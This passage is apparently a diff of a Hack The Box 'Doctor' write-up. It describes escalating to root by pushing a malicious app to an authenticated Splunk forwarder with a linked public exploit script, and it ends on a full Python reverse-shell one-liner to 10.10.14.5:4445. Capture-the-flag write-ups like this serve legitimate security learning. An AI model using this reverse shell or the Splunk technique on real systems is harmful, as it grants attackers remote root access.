captainGeech42/zanderwork.com/content/blog/htb-doctor.md

 I started Googling for a way to exploit this service, and quickly discovered [this fantastic blog post](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/) by [@eapolsniper](https://twitter.com/eapolsniper).
 Since we have authenticated access to the service, we can create a malicious app (like a plugin) for the forwarder that will provide RCE as root.

 I used [this script](https://github.com/cnotin/SplunkWhisperer2/blob/master/PySplunkWhisperer2/PySplunkWhisperer2_local.py) (mentioned in that blog post) to create a malicious application that ran the below shell script, which would give me a reverse shell as `root`.
-Please note that the script was written for Python 2, and I had to adapt it for Python 3 as that's what was available on the box (change the `print ...` to `print(...)`).
+Please note that the script was written for Python 2, and I had to adapt it for Python 3 as that's what was available on the box (change the `print ...` statements to `print(...)`).

 ```
 python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.5\",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\", \"-i\"]);'